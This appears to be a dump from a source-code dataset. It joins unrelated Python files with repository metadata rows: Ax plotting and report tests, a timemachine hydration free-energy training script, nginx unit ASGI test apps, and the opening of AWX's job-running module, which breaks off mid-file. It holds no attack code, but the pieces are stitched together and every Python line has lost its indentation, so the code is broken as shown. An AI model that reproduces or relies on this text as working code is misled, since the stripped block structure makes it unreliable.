# 3. test all trials not started yet
for t in exp.trials.values():
t._time_run_started = None
df = exp_to_df(
exp=exp,
trial_attribute_fields=["time_run_started", "time_completed"],
always_include_field_columns=True,
)
self.assertTrue(all(df["time_run_started"].isnull()))
# 4. test some trials are completed
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=2)
df = exp_to_df(
exp=exp, trial_attribute_fields=["time_run_started", "time_completed"]
)
# the last trial should have NaN for rel_time_completed
self.assertTrue(df["time_completed"].isnull().iloc[2])
def test_exp_to_df(self) -> None:
# MultiTypeExperiment should fail
exp = get_multi_type_experiment()
with self.assertRaisesRegex(ValueError, "MultiTypeExperiment"):
exp_to_df(exp=exp)
# exp with no trials should return empty results
exp = get_branin_experiment()
df = exp_to_df(exp=exp)
self.assertEqual(len(df), 0)
# set up experiment
exp = get_branin_experiment(with_batch=True)
# check that pre-run experiment returns all columns except objective
df = exp_to_df(exp)
self.assertEqual(set(EXPECTED_COLUMNS) - set(df.columns), {OBJECTIVE_NAME})
self.assertEqual(len(df.index), len(exp.arms_by_name))
exp.trials[0].run()
exp.fetch_data()
# assert result is df with expected columns and length
df = exp_to_df(exp=exp)
self.assertIsInstance(df, pd.DataFrame)
self.assertListEqual(sorted(df.columns), sorted(EXPECTED_COLUMNS))
self.assertEqual(len(df.index), len(exp.arms_by_name))
# test with run_metadata_fields and trial_properties_fields not empty
# add source to properties
for _, trial in exp.trials.items():
trial._properties["source"] = DUMMY_SOURCE
df = exp_to_df(
exp, run_metadata_fields=["name"], trial_properties_fields=["source"]
)
self.assertIn("name", df.columns)
self.assertIn("trial_properties_source", df.columns)
# test column values or types
self.assertTrue(all(x == 0 for x in df.trial_index))
self.assertTrue(all(x == "RUNNING" for x in df.trial_status))
self.assertTrue(all(x == "Sobol" for x in df.generation_method))
self.assertTrue(all(x == DUMMY_SOURCE for x in df.trial_properties_source))
self.assertTrue(all(x == "branin_test_experiment_0" for x in df.name))
for float_column in FLOAT_COLUMNS:
self.assertTrue(all(isinstance(x, float) for x in df[float_column]))
# works correctly for failed trials (will need to mock)
dummy_struct = namedtuple("dummy_struct", "df")
mock_results = dummy_struct(
df=pd.DataFrame(
{
"arm_name": ["0_0"],
"metric_name": [OBJECTIVE_NAME],
"mean": [DUMMY_OBJECTIVE_MEAN],
"sem": [0],
"trial_index": [0],
"n": [123],
"frac_nonnull": [1],
}
)
)
with patch.object(Experiment, "lookup_data", lambda self: mock_results):
df = exp_to_df(exp=exp)
# all but one row should have a metric value of NaN
self.assertEqual(pd.isna(df[OBJECTIVE_NAME]).sum(), len(df.index) - 1)
# an experiment with more results than arms raises an error
with patch.object(
Experiment, "lookup_data", lambda self: mock_results
), self.assertRaisesRegex(ValueError, "inconsistent experimental state"):
exp_to_df(exp=get_branin_experiment())
# custom added trial has a generation_method of Manual
custom_arm = Arm(name="custom", parameters={"x1": 0, "x2": 0})
exp.new_trial().add_arm(custom_arm)
df = exp_to_df(exp)
self.assertEqual(
df[df.arm_name == "custom"].iloc[0].generation_method, "Manual"
)
# failing feasibility calculation doesn't warns and suppresses error
observations = [[1.0, 2.0, 3.0], [4.0, 5.0, -6.0], [7.0, 8.0, 9.0]]
exp = get_experiment_with_observations(
observations=observations,
constrained=True,
)
with patch(
f"{exp_to_df.__module__}._is_row_feasible", side_effect=KeyError(DUMMY_MSG)
), self.assertLogs(logger="ax", level=WARN) as log:
exp_to_df(exp)
self.assertIn(
f"Feasibility calculation failed with error: '{DUMMY_MSG}'",
log.output[0],
)
# infeasible arm has `is_feasible = False`.
df = exp_to_df(exp)
self.assertListEqual(list(df[FEASIBLE_COL_NAME]), [True, False, True])
# all rows infeasible.
observations = [[1.0, 2.0, -3.0], [4.0, 5.0, -6.0], [7.0, 8.0, -9.0]]
exp = get_experiment_with_observations(
observations=observations,
constrained=True,
)
df = exp_to_df(exp)
self.assertListEqual(list(df[FEASIBLE_COL_NAME]), [False, False, False])
def test_get_shortest_unique_suffix_dict(self) -> None:
expected_output = {
"abc.123": "abc.123",
"asdf.abc.123": "asdf.abc.123",
"def.123": "def.123",
"abc.456": "456",
"": "",
"no_delimiter": "no_delimiter",
}
actual_output = _get_shortest_unique_suffix_dict(
["abc.123", "abc.456", "def.123", "asdf.abc.123", "", "no_delimiter"]
)
self.assertDictEqual(expected_output, actual_output)
@fast_botorch_optimize
def test_get_standard_plots(self) -> None:
exp = get_branin_experiment()
self.assertEqual(
len(
get_standard_plots(
experiment=exp, model=get_generation_strategy().model
)
),
0,
)
exp = get_branin_experiment(with_batch=True, minimize=True)
exp.trials[0].run()
model = Models.BOTORCH(experiment=exp, data=exp.fetch_data())
for gsa, true_objective_metric_name in itertools.product(
[False, True], ["branin", None]
):
with self.subTest(global_sensitivity_analysis=gsa):
plots = get_standard_plots(
experiment=exp,
model=model,
global_sensitivity_analysis=gsa,
true_objective_metric_name=true_objective_metric_name,
)
self.assertEqual(len(plots), 8 if true_objective_metric_name else 6)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
# Raise an exception in one plot and make sure we generate the others
for plot_function, num_expected_plots in [
[_get_curve_plot_dropdown, 8], # Not used
[_get_objective_trace_plot, 6],
[_objective_vs_true_objective_scatter, 7],
[_get_objective_v_param_plots, 6],
[_get_cross_validation_plots, 7],
[plot_feature_importance_by_feature_plotly, 6],
]:
with mock.patch(
# pyre-ignore
f"ax.service.utils.report_utils.{plot_function.__name__}",
side_effect=Exception(),
):
plots = get_standard_plots(
experiment=exp,
model=model,
global_sensitivity_analysis=True,
true_objective_metric_name="branin",
)
self.assertEqual(len(plots), num_expected_plots)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
@fast_botorch_optimize
def test_get_standard_plots_moo(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds = [
ObjectiveThreshold(
metric=exp.metrics["branin_a"], op=ComparisonOp.GEQ, bound=-100.0
),
ObjectiveThreshold(
metric=exp.metrics["branin_b"], op=ComparisonOp.LEQ, bound=100.0
),
]
exp.trials[0].run()
# NOTE: level set to INFO in this block, because the global sensitivity
# analysis raises an INFO level log entry here. Leaving level=WARN here
# actually passes on Python 3.8 because of a language internal bug. See
# https://bugs.python.org/issue41943 for more information.
with self.assertLogs(logger="ax", level=INFO) as log:
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(log.output), 2)
self.assertIn(
"Pareto plotting not supported for experiments with relative objective "
"thresholds.",
log.output[0],
)
self.assertIn(
"Failed to compute global feature sensitivities:",
log.output[1],
)
self.assertEqual(len(plots), 6)
@fast_botorch_optimize
def test_get_standard_plots_moo_relative_constraints(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds = [
ObjectiveThreshold(
metric=exp.metrics["branin_a"], op=ComparisonOp.GEQ, bound=-100.0
),
ObjectiveThreshold(
metric=exp.metrics["branin_b"], op=ComparisonOp.LEQ, bound=100.0
),
]
exp.trials[0].run()
for ot in checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds:
ot.relative = False
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(plots), 8)
@fast_botorch_optimize
def test_get_standard_plots_moo_no_objective_thresholds(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
exp.trials[0].run()
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(plots), 8)
@fast_botorch_optimize
def test_get_standard_plots_map_data(self) -> None:
exp = get_branin_experiment_with_timestamp_map_metric(with_status_quo=True)
exp.new_trial().add_arm(exp.status_quo)
exp.trials[0].run()
exp.new_trial(
generator_run=Models.SOBOL(search_space=exp.search_space).gen(n=1)
)
exp.trials[1].run()
plots = get_standard_plots(
experiment=exp,
model=Models.BOTORCH(experiment=exp, data=exp.fetch_data()),
true_objective_metric_name="branin",
)
self.assertEqual(len(plots), 9)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
self.assertIn(
"Objective branin_map vs. True Objective Metric branin",
[p.layout.title.text for p in plots],
)
with self.assertRaisesRegex(
ValueError, "Please add a valid true_objective_metric_name"
):
plots = get_standard_plots(
experiment=exp,
model=Models.BOTORCH(experiment=exp, data=exp.fetch_data()),
true_objective_metric_name="not_present",
)
@fast_botorch_optimize
def test_skip_contour_high_dimensional(self) -> None:
exp = get_high_dimensional_branin_experiment()
# Initial Sobol points
sobol = Models.SOBOL(search_space=exp.search_space)
for _ in range(1):
exp.new_trial(sobol.gen(1)).run()
model = Models.GPEI(
experiment=exp,
data=exp.fetch_data(),
)
with self.assertLogs(logger="ax", level=WARN) as log:
_get_objective_v_param_plots(experiment=exp, model=model)
self.assertEqual(len(log.output), 1)
self.assertIn("Skipping creation of 2450 contour plots", log.output[0])
_get_objective_v_param_plots(
experiment=exp, model=model, max_num_slice_plots=10
)
# Adds two more warnings.
self.assertEqual(len(log.output), 3)
self.assertIn("Skipping creation of 50 slice plots", log.output[1])
def test_get_metric_name_pairs(self) -> None:
exp = get_branin_experiment(with_trial=True)
exp._optimization_config = MultiObjectiveOptimizationConfig(
objective=MultiObjective(
objectives=[
Objective(metric=Metric("m0")),
Objective(metric=Metric("m1")),
Objective(metric=Metric("m2")),
Objective(metric=Metric("m3")),
Objective(metric=Metric("m4")),
]
)
)
with self.assertLogs(logger="ax", level=WARN) as log:
metric_name_pairs = _get_metric_name_pairs(experiment=exp)
self.assertEqual(len(log.output), 1)
self.assertIn(
"Creating pairwise Pareto plots for the first `use_n_metrics",
log.output[0],
)
self.assertListEqual(
list(metric_name_pairs),
list(itertools.combinations([f"m{i}" for i in range(4)], 2)),
)
|
2bdcb1d802f64bf07ab8132ffeb06c3d1bf60908
|
2898b860d0440fb10a83d8f28815ac75b0cec9a5
|
/attic/training/hydration_fe.py
|
580f38eefe4b65081d4c8b69477602012164eb55
|
[
"Apache-2.0"
] |
permissive
|
proteneer/timemachine
|
e3530e52aa995a9006d0eca8632ac6b937571980
|
b853c2d287da0d1c1babb963eaec8fda41539b90
|
refs/heads/master
| 2023-08-18T09:00:55.463397
| 2023-08-17T22:07:22
| 2023-08-17T22:07:22
| 163,188,061
| 132
| 14
|
NOASSERTION
| 2023-09-13T21:39:20
| 2018-12-26T14:25:45
|
Python
|
UTF-8
|
Python
| false
| false
| 8,240
|
py
|
hydration_fe.py
|
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
from jax.config import config as jax_config
jax_config.update("jax_enable_x64", True)
import argparse
import time
import datetime
import numpy as np
import os
import sys
from timemachine.ff import handlers
from timemachine.ff.handlers.serialize import serialize_handlers
from timemachine.ff.handlers.deserialize import deserialize_handlers
from rdkit import Chem
import configparser
import grpc
from timemachine.training import dataset
from training import hydration_model, hydration_setup
from training import simulation
from training import service_pb2_grpc
from timemachine.lib import LangevinIntegrator
from timemachine.md import builders
# used during visualization to bring everything back to home box
def recenter(conf, box):
new_coords = []
periodicBoxSize = box
for atom in conf:
diff = np.array([0.0, 0.0, 0.0])
diff += periodicBoxSize[2] * np.floor(atom[2] / periodicBoxSize[2][2])
diff += periodicBoxSize[1] * np.floor((atom[1] - diff[1]) / periodicBoxSize[1][1])
diff += periodicBoxSize[0] * np.floor((atom[0] - diff[0]) / periodicBoxSize[0][0])
new_coords.append(atom - diff)
return np.array(new_coords)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Absolute Hydration Free Energy Script")
parser.add_argument("--config_file", type=str, required=True, help="Location of config file.")
args = parser.parse_args()
config = configparser.ConfigParser()
config.read(args.config_file)
print("Config Settings:")
config.write(sys.stdout)
general_cfg = config["general"]
# basic gist of workflow:
# 1. configure learning rates for the optimizer
# 2. load freesolv dataset from SDF file
# 3. split dataset into train/test
# 4. connect to workers
# 5. deserialize off smirnoff parameters
# 6. prepare water box
# 7. for each epoch, first run on test set then shuffled training set
# 8. save parameters after each molecule
# set up learning rates
learning_rates = {}
for k, v in config["learning_rates"].items():
vals = [float(x) for x in v.split(",")]
if k == "am1ccc":
learning_rates[handlers.AM1CCCHandler] = np.array(vals)
elif k == "lj":
learning_rates[handlers.LennardJonesHandler] = np.array(vals)
intg_cfg = config["integrator"]
suppl = Chem.SDMolSupplier(general_cfg["ligand_sdf"], removeHs=False)
data = []
for guest_idx, mol in enumerate(suppl):
label_dG = -4.184 * float(mol.GetProp(general_cfg["dG"])) # in kcal/mol
label_err = 4.184 * float(mol.GetProp(general_cfg["dG_err"])) # errs are positive!
data.append((mol, label_dG, label_err))
full_dataset = dataset.Dataset(data)
train_frac = float(general_cfg["train_frac"])
train_dataset, test_dataset = full_dataset.split(train_frac)
forcefield = general_cfg["forcefield"]
stubs = []
worker_address_list = []
for address in config["workers"]["hosts"].split(","):
worker_address_list.append(address)
for address in worker_address_list:
print("connecting to", address)
channel = grpc.insecure_channel(
address,
options=[
("grpc.max_send_message_length", 500 * 1024 * 1024),
("grpc.max_receive_message_length", 500 * 1024 * 1024),
],
)
stub = service_pb2_grpc.WorkerStub(channel)
stubs.append(stub)
ff_raw = open(forcefield, "r").read()
ff_handlers = deserialize_handlers(ff_raw)
box_width = 3.0
host_system, host_coords, box, _ = builders.build_water_system(box_width)
lambda_schedule = np.array([float(x) for x in general_cfg["lambda_schedule"].split(",")])
num_steps = int(general_cfg["n_steps"])
for epoch in range(100):
print("Starting Epoch", epoch, datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S"))
epoch_dir = os.path.join(general_cfg["out_dir"], "epoch_" + str(epoch))
if not os.path.exists(epoch_dir):
os.makedirs(epoch_dir)
epoch_params = serialize_handlers(ff_handlers)
with open(os.path.join(epoch_dir, "start_epoch_params.py"), "w") as fh:
fh.write(epoch_params)
all_data = []
test_items = [(x, True) for x in test_dataset.data]
train_dataset.shuffle()
train_items = [(x, False) for x in train_dataset.data]
all_data.extend(test_items)
all_data.extend(train_items)
for idx, ((mol, label_dG, label_err), inference) in enumerate(all_data):
if inference:
prefix = "test"
else:
prefix = "train"
start_time = time.time()
# out_dir = os.path.join(epoch_dir, "mol_"+mol.GetProp("_Name"))\
# if not os.path.exists(out_dir):
# os.makedirs(out_dir)
# safety guard
try:
potentials, masses, vjp_fns = hydration_setup.combine_potentials(
ff_handlers, mol, host_system, precision=np.float32
)
coords = hydration_setup.combine_coordinates(host_coords, mol)
seed = np.random.randint(0, np.iinfo(np.int32).max)
intg = LangevinIntegrator(
float(intg_cfg["temperature"]), float(intg_cfg["dt"]), float(intg_cfg["friction"]), masses, seed
)
sim = simulation.Simulation(coords, np.zeros_like(coords), box, potentials, intg)
(pred_dG, pred_err), grad_dG, du_dls = hydration_model.simulate(sim, num_steps, lambda_schedule, stubs)
plt.plot(lambda_schedule, du_dls)
plt.ylabel("du_dlambda")
plt.xlabel("lambda")
plt.savefig(os.path.join(epoch_dir, "ti_mol_" + mol.GetProp("_Name")))
plt.clf()
loss = np.abs(pred_dG - label_dG)
# (ytz) bootstrap CI on TI is super janky
# error CIs are wrong "95% CI [{:.2f}, {:.2f}, {:.2f}]".format(pred_err.lower_bound, pred_err.value, pred_err.upper_bound),
print(
prefix,
"mol",
mol.GetProp("_Name"),
"loss {:.2f}".format(loss),
"pred_dG {:.2f}".format(pred_dG),
"label_dG {:.2f}".format(label_dG),
"label err {:.2f}".format(label_err),
"time {:.2f}".format(time.time() - start_time),
"smiles:",
Chem.MolToSmiles(mol),
)
# update ff parameters
if not inference:
loss_grad = np.sign(pred_dG - label_dG)
assert len(grad_dG) == len(vjp_fns)
for grad, handle_and_vjp_fns in zip(grad_dG, vjp_fns):
for handle, vjp_fn in handle_and_vjp_fns:
if type(handle) in learning_rates:
bounds = learning_rates[type(handle)]
dL_dp = loss_grad * vjp_fn(grad)[0]
dL_dp = np.clip(dL_dp, -bounds, bounds)
handle.params -= dL_dp
epoch_params = serialize_handlers(ff_handlers)
# write parameters after each training molecule
with open(
os.path.join(
epoch_dir, "checkpoint_params_idx_" + str(idx) + "_mol_" + mol.GetProp("_Name") + ".py"
),
"w",
) as fh:
fh.write(epoch_params)
except Exception as e:
import traceback
print("Exception in mol", mol.GetProp("_Name"), Chem.MolToSmiles(mol), e)
traceback.print_exc()
# epoch_params = serialize_handlers(ff_handlers)
# with open(os.path.join(epoch_dir, "end_epoch_params.py"), 'w') as fh:
# fh.write(epoch_params)
|
a13b63a9c01533bf7d75c0d77ada364a8670aa5c
|
331640994b1b6f66c1639278571ddbdc6c8c0751
|
/test/python/targets/asgi.py
|
749ec5b108ede5fb1e1a7761dbd2023b4d6bf0e5
|
[
"Apache-2.0"
] |
permissive
|
nginx/unit
|
eabcd067eaa60f4bdcf0cfaffe7d9932add2c66a
|
9b22b6957bc87b3df002d0bc691fdae6a20abdac
|
refs/heads/master
| 2023-09-04T02:02:13.581700
| 2023-08-30T16:07:24
| 2023-08-30T16:07:24
| 102,627,638
| 4,649
| 452
|
Apache-2.0
| 2023-09-12T01:28:22
| 2017-09-06T15:45:30
|
C
|
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
asgi.py
|
async def application_201(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 201,
'headers': [(b'content-length', b'0')],
}
)
async def application_200(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'0')],
}
)
async def application_prefix(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [
(b'content-length', b'0'),
(b'prefix', scope.get('root_path', 'NULL').encode()),
],
}
)
await send({'type': 'http.response.body', 'body': b''})
def legacy_application_200(scope):
assert scope['type'] == 'http'
return legacy_app_http_200
async def legacy_app_http_200(receive, send):
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'0')],
}
)
def legacy_application_201(scope, receive=None, send=None):
assert scope['type'] == 'http'
return legacy_app_http_201
async def legacy_app_http_201(receive, send):
await send(
{
'type': 'http.response.start',
'status': 201,
'headers': [(b'content-length', b'0')],
}
)
|
a770b81dbd3dae503449996241ba9fd658b5fc07
|
8de1480d6511ac81c43ebb1fa50875adb1505c3b
|
/awx/main/tasks/jobs.py
|
6e57dfd8e4031624ee2d4f0138d6f5c0cea31c26
|
[
"Apache-2.0"
] |
permissive
|
ansible/awx
|
bbbb0f3f43835a37fbb3eb3dcd7cfe98116fbbba
|
5e105c2cbd3fe828160540b3043cf6f605ed26be
|
refs/heads/devel
| 2023-08-31T11:45:01.446444
| 2023-08-31T04:58:57
| 2023-08-31T04:58:57
| 91,594,105
| 13,353
| 4,186
|
NOASSERTION
| 2023-09-14T20:20:07
| 2017-05-17T15:50:14
|
Python
|
UTF-8
|
Python
| false
| false
| 88,555
|
py
|
jobs.py
|
# Python
from collections import OrderedDict
import errno
import functools
import fcntl
import json
import logging
import os
from pathlib import Path
import shutil
import stat
import yaml
import tempfile
import traceback
import time
import urllib.parse as urlparse
# Django
from django.conf import settings
# Runner
import ansible_runner
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# AWX
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_task_queuename
from awx.main.constants import (
PRIVILEGE_ESCALATION_METHODS,
STANDARD_INVENTORY_UPDATE_ENV,
JOB_FOLDER_PREFIX,
MAX_ISOLATED_PATH_COLON_DELIMITER,
CONTAINER_VOLUMES_MOUNT_TYPES,
ACTIVE_STATES,
HOST_FACTS_FIELDS,
)
from awx.main.models import (
Instance,
Inventory,
InventorySource,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.tasks.callback import (
RunnerCallback,
RunnerCallbackForAdHocCommand,
RunnerCallbackForInventoryUpdate,
RunnerCallbackForProjectUpdate,
RunnerCallbackForSystemJob,
)
from awx.main.tasks.signals import with_signal_handling, signal_callback
from awx.main.tasks.receptor import AWXReceptorJob
from awx.main.tasks.facts import start_fact_cache, finish_fact_cache
from awx.main.exceptions import AwxTaskError, PostRunError, ReceptorNodeNotFound
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.execution_environments import CONTAINER_ROOT, to_container_path
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.common import (
update_scm_url,
extract_ansible_vars,
get_awx_version,
create_partition,
)
from awx.conf.license import get_license
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.tasks.system import update_smart_memberships_for_inventory, update_inventory_computed_fields
from awx.main.utils.update_model import update_model
from rest_framework.exceptions import PermissionDenied
from django.utils.translation import gettext_lazy as _
logger = logging.getLogger('awx.main.tasks.jobs')
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
callback_class = RunnerCallback
def __init__(self):
self.cleanup_paths = []
self.update_attempts = int(settings.DISPATCHER_DB_DOWNTIME_TOLERANCE / 5)
self.runner_callback = self.callback_class(model=self.model)
def update_model(self, pk, _attempt=0, **updates):
return update_model(self.model, pk, _attempt=0, _max_attempts=self.update_attempts, **updates)
def write_private_data_file(self, private_data_dir, file_name, data, sub_dir=None, file_permissions=0o600):
base_path = private_data_dir
if sub_dir:
base_path = os.path.join(private_data_dir, sub_dir)
os.makedirs(base_path, mode=0o700, exist_ok=True)
# If we got a file name create it, otherwise we want a temp file
if file_name:
file_path = os.path.join(base_path, file_name)
else:
handle, file_path = tempfile.mkstemp(dir=base_path)
os.close(handle)
file = Path(file_path)
file.touch(mode=file_permissions, exist_ok=True)
with open(file_path, 'w') as f:
f.write(data)
return file_path
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
"""
Return params structure to be executed by the container runtime
"""
if settings.IS_K8S and instance.instance_group.is_container_group:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if settings.DEFAULT_CONTAINER_RUN_OPTIONS:
params['container_options'].extend(settings.DEFAULT_CONTAINER_RUN_OPTIONS)
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if all([cred.has_input(field_name) for field_name in ('host', 'username', 'password')]):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Verify if a mount path and SELinux context has been passed
# Using z allows the dir to be mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
if this_path.count(':') == MAX_ISOLATED_PATH_COLON_DELIMITER:
src, dest, mount_option = this_path.split(':')
# mount_option validation via performed via API, but since this can be overriden via settings.py
if mount_option not in CONTAINER_VOLUMES_MOUNT_TYPES:
mount_option = 'z'
logger.warning(f'The path {this_path} has volume mount type {mount_option} which is not supported. Using "z" instead.')
params['container_volume_mounts'].append(f'{src}:{dest}:{mount_option}')
elif this_path.count(':') == MAX_ISOLATED_PATH_COLON_DELIMITER - 1:
src, dest = this_path.split(':')
params['container_volume_mounts'].append(f'{src}:{dest}:z')
else:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix=JOB_FOLDER_PREFIX % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
# We will write files in these folders later
for subfolder in ('inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_project_dir(self, instance, private_data_dir):
"""
Create the ansible-runner project subdirectory. In many cases this is the source checkout.
In cases that do not even need the source checkout, we create an empty dir to be the workdir.
"""
project_dir = os.path.join(private_data_dir, 'project')
if not os.path.exists(project_dir):
os.mkdir(project_dir)
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
ssh_key_data = None
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
ssh_key_data = data
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
private_data_files['credentials'][credential] = self.write_private_data_file(private_data_dir, None, data, sub_dir='env')
for credential, data in private_data.get('certificates', {}).items():
self.write_private_data_file(private_data_dir, 'ssh_key_data-cert.pub', data, sub_dir=os.path.join('artifacts', str(self.instance.id)))
return private_data_files, ssh_key_data
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
content = yaml.safe_dump(vars)
else:
content = safe_dump(vars, safe_dict)
return self.write_private_data_file(private_data_dir, 'extravars', content, sub_dir='env')
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError(f'The {self.model.__name__} could not run because there is no Execution Environment.')
return env
def write_inventory_file(self, inventory, private_data_dir, file_name, script_params):
script_data = inventory.get_script_data(**script_params)
for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items():
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.runner_callback.host_map[hostname] = hv.get('remote_tower_id', '')
file_content = '#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json.dumps(script_data)
return self.write_private_data_file(private_data_dir, file_name, file_content, sub_dir='inventory', file_permissions=0o700)
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
return self.write_inventory_file(instance.inventory, private_data_dir, 'hosts', script_params)
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'cmdline', ansible_runner.utils.args2cmdline(*args), sub_dir='env')
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def release_lock(self, project):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, project.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
def acquire_lock(self, project, unified_job_id=None):
